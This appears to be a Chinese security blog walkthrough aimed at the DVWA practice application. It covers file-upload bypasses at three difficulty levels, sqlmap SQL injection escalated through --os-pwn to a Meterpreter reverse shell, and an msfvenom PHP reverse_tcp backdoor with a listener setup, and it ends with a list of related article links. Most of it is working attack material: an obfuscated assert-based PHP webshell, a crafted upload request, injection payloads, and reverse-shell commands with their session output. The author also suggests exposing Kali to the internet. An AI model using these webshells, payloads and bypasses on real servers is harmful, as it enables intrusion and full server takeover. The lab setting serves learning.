DWVA上传漏洞挖掘的测试例子
low:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
没有对文件类型进行限制,直接将php文件上传,之后访问:http://localhost/hackable/uploads/XX.php即可。
medium:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
对上传的文件进行限制。
解决方法1:用burp suite进行00截断,将文件名改为1.php .jpg(注意中间有空格)然后在拦截中将空格改为00。
解决方法2:直接上传2.php文件之后进行拦截,数据包如下
POST /vulnerabilities/upload/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/vulnerabilities/upload/
Cookie: PHPSESSID=pgke4molj8bath1fmdh7mvt686; security=medium
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------143381619322555
Content-Length: 549
-----------------------------143381619322555
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
-----------------------------143381619322555
Content-Disposition: form-data; name="uploaded"; filename="2.php"
Content-Type: application/octet-stream
<?php
$item['wind'] = 'assert';
$array[] = $item;
$array[0]['wind']($_POST['loveautumn']);
?>
-----------------------------143381619322555
Content-Disposition: form-data; name="Upload"
Upload
-----------------------------143381619322555--
将红色的部分修改成:Content-Type: image/jpeg即可绕过。
High:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
对图片的命名和类型进行了严格的限制,那么可以用文件头欺骗的方式来解决这个问题。另外,假设文件名为1.php.png,strrpos会截取.出现的最后位置是5,之后substr从第六位开始重新命名文件名,也就是最终上传的文件名会被改成png,会被拦截掉。
首先使用记事本对正常图片文件编辑,将php一句话代码写到图片最下面,保存。这样就可以欺骗文件类型的检测。
最后对文件名的重命名进行绕过。将文件名改为1.php .png上传,用burpsuite拦截:
Content-Disposition: form-data; name="uploaded"; filename="1.php .png"部分修改为
Content-Disposition: form-data; name="uploaded"; filename="1.php\X00.php .png"的话可以获得一个x00.php .png文件,这个是之前有php任意文件上传漏洞的文章中提到过的。对空格截断无效。目前不知道最终答案,可能是上传一个含有一句话的jpg文件之后采用文件包含来完成?暂时存疑
nexpose安装在虚拟机中比较麻烦,所以直接安装到物理机上,kali安装在虚拟机中,执行扫描命令如下:
首先确定是否连接数据库:
msf > db_status
[*] postgresql connected to msf3
确认后
msf > load nexpose
连接后
msf > nexpose_connect loveautumn:pass@192.168.1.8:3780 ok----loveautumn是用户名,pass是密码,192.168.1.8是物理机IP
msf > nexpose_scan 192.168.1.8
[*] Scanning 1 addresses with template pentest-audit in sets of 32
自己搭建一个PHP+MYSQL平台,靶场为DVWA,设置SQL注入靶场级别为low(方便测试使用)。
在提交框中输入1,用burp抓包,将包数据复制到cookies.txt文档中,拖到kali环境。
root@kali:~# sqlmap -r "/root/cookies.txt"
返回:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-1890' OR 7466=7466#&Submit=Submit
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: id=-6878' OR 1 GROUP BY CONCAT(0x7162626271,(SELECT (CASE WHEN (5403=5403) THEN 1 ELSE 0 END)),0x716b766271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: id=' AND (SELECT * FROM (SELECT(SLEEP(5)))Dgpu)#&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=' UNION ALL SELECT NULL,CONCAT(0x7162626271,0x4c4266596d5953594265,0x716b766271)#&Submit=Submit
---
[13:45:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.10
back-end DBMS: MySQL 5.0.12
[13:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.8'
确定注入点后:
root@kali:~# sqlmap -r "/root/cookies.txt" --os-pwn --msf-path=/opt/metasploit
部分省略
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1(使用metasploit的TCP连接shell)
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4(PHP的脚本)
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2(自定义路径)
please provide a comma separate list of absolute directory paths: D:/WWW/DVWA/(输入绝对路径)
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1(TCP反向连接shell)
what is the local address? [Enter for '192.168.1.104' (detected)]
which local port number do you want to use? [16308]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1(meterpreter shell)
部分省略
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 16308
LHOST => 192.168.1.104
[*] Started reverse handler on 192.168.1.104:16308
[*] Starting the payload handler...
[13:46:43] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[*] Sending stage (957487 bytes) to 192.168.1.8
[*] Meterpreter session 1 opened (192.168.1.104:16308 -> 192.168.1.8:37639) at 2016-01-17 13:46:45 +0800
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > Computer : PGOS
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32
meterpreter > Server username: PGOS\Administrator
meterpreter >
同时,DVWA目录下会生成一个随机的php上传shell。
Metasploit简介
灰帽黑客(第3版) Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户
metasploit框架PHP反向后门建立
msfvenom -l 查看所有payload
Framework Payloads (436 total)
==============================
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
其他的省略。
这里要使用的是PHP反向后门
msfvenom -p php/meterpreter/reverse_tcp --payload-options 查看参数
Options for payload/php/meterpreter/reverse_tcp:
Name: PHP Meterpreter, PHP Reverse TCP Stager
Module: payload/php/meterpreter/reverse_tcp
Platform: PHP
Arch: php
Needs Admin: No
Total size: 936
Rank: Normal
Provided by:
egypt <egypt@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address
LPORT 4444 yes The listen port
Description:
Run a meterpreter server in PHP. Reverse PHP connect back stager
with checks for disabled functions
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 生成脚本
生成后要将脚本最前面的注释符去掉,然后上传到目标服务器上
启动msf
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 1234
exploit 启动监听
然后从浏览器中打开上传的脚本http://xxx.com/c.php
msf中就会看到
*] Starting the payload handler...
[*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX
[*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at
meterpreter >
如果kali安装在虚拟机上,需要桥接,然后路由器上将kali DMZ到外网
注意:此教程只用于学习使用其它一切后果与本站无前
相关文章
- 这篇文章主要介绍了解决@SpringBootTest 单元测试遇到的坑,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教...2021-10-14
- Multipart/form-data是文件上传或数据提交时会用到了,在php中Multipart/form-data是有安全bug的,下面我们来看看如何修复Multipart/form-data的bug吧. 今天在乌云...2016-11-25
- 本文章来人大家介绍一个php文件上传类的使用方法,期望此实例对各位php入门者会有不小帮助哦。 简介 Class.upload.php是用于管理上传文件的php文件上传类, 它可以帮...2016-11-25
- 又码了一个周末的代码,这次在做一些关于文件上传的东西。(PHP UPLOAD)小有收获项目是一个BT种子列表,用户有权限上传自己的种子,然后配合BT TRACK服务器把种子的信息写出来...2016-11-25
- 本文实例讲述了jQuery实现文件上传进度条效果的代码。分享给大家供大家参考。具体如下: 运行效果截图如下:具体代码如下:<!DOCTYPE html><html><head><meta charset="utf-8"><title>upload</title><link rel="stylesheet...2015-11-24
- 本篇文章主要说明的是与php文件上传的相关配置的知识点。PHP文件上传功能配置主要涉及php.ini配置文件中的upload_tmp_dir、upload_max_filesize、post_max_size等选项,下面一一说明。打开php.ini配置文件找到File Upl...2015-10-21
- EXCEL数据上传到SQL SERVER中的方法需要注意到三点!注意点一:要把EXCEL数据上传到SQL SERVER中必须提前把EXCEL传到服务器上.做法: 在ASP.NET环境中,添加一个FileUpload上传控件后台代码的E.X: 复制代码 代码如下: if...2013-09-23
- DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞...2016-11-25
- mail()函数的作用:连接到邮件服务器,利用smtp协议,与该服务器交互并投邮件。注意:1、mail函数不支持esmtp协议,---即,只能直投,不能登陆2、由上条,我们只能直投至最终的收件服务器地址.而该地址,又是在PHP.ini中指定的,所...2015-10-30
- PHP代码如下:复制代码 代码如下:if (isset($_FILES["Filedata"]) || !is_uploaded_file($_FILES["Filedata"]["tmp_name"]) || $_FILES["Filedata"]["error"] != 0) { $upload_file = $_FILES['Filedata']; $fil...2013-10-04
- 宿主机使用网线的时候,客户机在Bridged Adapter模式下,使用Atheros AR8131 PCI-E Gigabit Ethernet Controller上网没问题。 宿主机使用无线的时候,客户机在Bridged Adapter模式下,使用可选项里唯一一个WIFI选项,Microsoft Virtual Wifi Miniport Adapter也无法上网,故弃之。...2013-09-19
- 本案例非通用,仅作笔记以备用 修改后的结果是 百度编辑器里上传的图片路径为/d/file/upload1...2014-07-03
- 这篇文章主要为大家详细介绍了js实现上传图片及时预览的相关资料,具有一定的参考价值,感兴趣的朋友可以参考一下...2016-05-09
- 这篇文章主要介绍了SpringMVC文件上传原理及实现过程解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下...2020-07-15
借助FileReader实现将文件编码为Base64后通过AJAX上传
这篇文章主要介绍了借助FileReader实现将文件编码为Base64后通过AJAX上传的方法,包括后端对文件数据解码并保存的PHP代码,需要的朋友可以参考下...2015-12-25- APC模块,它的全称是Alternative PHP Cache。APC可以将所有PHP代码会被缓存起来, 另外它可提供一定的内存缓存功能.但是这个功能并不是十分完美,有报告说如果频繁使用APC缓存的写入功能,会导致不可预料的错误.如果想使用...2015-10-30
- 这篇文章主要介绍了jQuery+ajax简单实现文件上传的方法,结合实例形式简单分析了jQuery基于ajax的post方法进行文件传输及asp.net后台处理技巧,需要的朋友可以参考下...2016-06-12
- 本文实例讲述了PHP多文件上传类,分享给大家供大家参考。具体如下:<?phpclass Test_Upload{ protected $_uploaded = array(); protected $_destination; protected $_max = 1024000; protected $_messages =...2015-10-30
- 这篇文章主要介绍了smartupload实现文件上传时获取表单数据的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下...2017-01-09
- 这篇文章主要介绍了Java实现将图片上传到webapp路径下 路径获取方式,具有很好的参考价值,希望对大家有所帮助。如有错误或未考虑完全的地方,望不吝赐教...2021-11-12